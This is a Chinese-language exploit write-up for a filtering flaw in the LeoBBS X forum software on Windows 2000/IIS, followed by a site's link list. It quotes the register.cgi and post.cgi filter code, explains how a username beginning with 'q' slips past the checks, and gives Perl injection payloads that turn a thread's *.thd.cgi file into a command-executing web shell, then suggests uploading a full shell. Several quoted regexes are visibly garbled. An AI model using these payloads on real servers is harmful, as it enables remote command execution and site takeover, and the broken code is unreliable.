雷傲论坛过滤不严漏洞的分析及利用

适用版本 leoBBS X 论坛 一般都存在的漏洞

适用系统 win2000+ iis

cgi 解析方式 perl.exe %s %s ,perlis.dll

漏洞原理：

利用了对用户输入的过滤不严，编写代码，从而获得shell。

结合利用register.cgi 和post.cgi 过滤不严。

1、看下lb 论坛的register.cgi注册中的过滤，

for ('inmembername'...)

$tp = $query-param($_);

$tp = &unHTML("$tp");

${$_} = $tp;

}

sub unHTML {} 里面的东西不重要。

&error("用户注册&对不起，您输入的用户名有问题，请不要在用户名中包含\@\#\$\%\^\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\\?\[\]这类字符！") if ($inmembername =~ /[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\\?\[\]]/);

if($inmembername =~ /_/) { &error("用户注册&请不要在用户名中使用下划线！"); }

$inmembername =~ s/\ \;//ig;

$inmembername =~ s/

/ /g;

$inmembername =~ s/?/ /g;

$inmembername =~ s/[ ]+/ /g;

$inmembername =~ s/[ ]+/_/;

$inmembername =~ s/[_]+/_/;

$inmembername =~ s/?/isg;

$inmembername =~ s///isg;

$inmembername =~ s/

//isg;

$inmembername =~ s/?//isg;

$inmembername =~ s/()+//isg;

$inmembername =~ s/[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\\?\[\]]//isg;

$inmembername =~ s/\s*$//g;

$inmembername =~ s/^\s*//g;

&error("用户注册&对不起，您输入的用户名有问题") if ($inmembername =~ /^q(.+?)-/ig);

$inmembername =~ /guest/i)||($inmembername =~ /qq-/i)||($inmembername =~ /q-/i)||($inmembername =~ /qx-/i)||($inmembername =~ /qw-/i)||($inmembername =~ /qr-/i)||($inmembername =~ /no)||($inmembername eq "admin")||($inmembername display/i)||($inmembername =~ /^system/i)||($inmembername =~ /---/ieq "root")||($inmembername eq "copy")||($inmembername =~ /^sub/)||($inmembername =~ /^exec/)||($inmembername =~ /\@ARGV/i)||($inmembername =~ /^require/)||($inmembername =~ /^rename/i)||($inmembername =~ /^dir/i)||($inmembername =~ /^print/i)||($inmembername =~ /^con/i)||($inmembername =~ /^nul/i)||($inmembername =~ /^aux/i)||($inmembername =~ /^com/i)||($inmembername =~ /^lpt/i));

但是忽略了 q及 qq、qw等的运用还可以用些特殊的符号的：），这是最关键的一步。

2、再看下post.cgi里对发贴的过滤

for ('forum','topic','membername','password','action','postno','inshowsignature',

'notify','inshowemoticons','intopictitle','inshowchgfont',

'inpost','posticon','inhiddentopic','postweiwang','moneyhidden','moneypost','uselbcode','inwater') {

next unless defined $_;

next if $_ eq 'SEND_MAIL';

$tp = $query-param($_);

$tp = &cleaninput("$tp");

${$_} = $tp;

}

sub cleaninput {

my ($self, $text) = _self_or_default(@_);

# my $text = shift;

study($text);

$text =~ s/[\a\f\e\0\r\t]//isg;

$text =~ s/\ / /g;

$text =~ s/\@ARGV/\&\#64\;ARGV/isg;

$text =~ s/\;/\&\#59\;/isg;

$text =~ s/\&/\&/g;

$text =~ s/\&\#/\&\#/isg;

$text =~ s/\&\;(.{1,6})\&\#59\;/\&$1\;/isg;

$text =~ s/\&\#([0-9]{1,6})\&\#59\;/\&\#$1\;/isg;

$text =~ s/"/\"/g;

$text =~ s/ / \ /g;

$text =~ s/</\</g;

$text =~ s//\>/g;

$text =~ s/ / /g;

$text =~ s/\n\n/<p/g;

$text =~ s/\n/<br/g;

$text =~ s/document.cookie/documents\&\#46\;cookie/isg;

$text =~ s/'/\&\#039\;/g;

$text =~ s/#/#/isg;

$text =~ s/&#/&#/isg;

return $text;

}

只要编写的代码饶过上面的过滤能运行，就可以的。

3、如此针对win2000的机子可以有下面的方法取的shell的

用perl.exe 解析的话

用 q? 为用户名注册 ?后面随意写，自然也可以用别的符号的，

他可不是 用 s/\`\~\!\@\#\$\%\^\&\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\\?\[\]]//isg;

~ /^q(.+?)-/ig

($inmembername =~ /qq-/i)||($inmembername =~ /q-/i)||($inmembername =~ /qx-/i)||($inmembername =~ /qw-/i)||($inmembername =~ /qr-/i)

就能全部过滤掉的：）。

接着只要在发贴的内容中写入

?and ($_=$ENV{QUERY_STRING}) and (s/%20/ /ig) and ($out=`$_`) and (print $out)

该forum下*.thd.cgi 就是个简单的shell了。

用 perlis.dll解析的话，构造好的话，也能实现目的的。（试了下，可以用

?and($cmd=q-dir ..- )and ($t=q-1.rar- )and (@s=`$cmd`) and sysopen(AA,$t,1|256)and print AA @s

(由于过滤了 ,这个想了好久，可能你会有更好的方法的。）能看到会员等目录的，想执行别的命令，修改$cmd就可以了；改后缀名上传个shell，然后改回来就可以获得shell了。

• ·天才侦探天马超之神秘楼|报价￥9.50|图书,
• ·天才侦探天马超之杀人蜂|报价￥9.30|图书,
• ·后门程序：GinaBackDoor简单实现
• ·LINUX2.4.x内核网络安全框架
• ·天才侦探天野冈之幽灵烛|报价￥10.80|图书
• ·樱桃小丸子故事书(7)|报价￥8.30|图书,
• ·研究UBB的跨站脚本攻击之综合篇
• ·国内某著名媒体公司的安全审核报告
• ·NET命令在操作系统中的另类用法
• ·IIS网站的"护心甲"——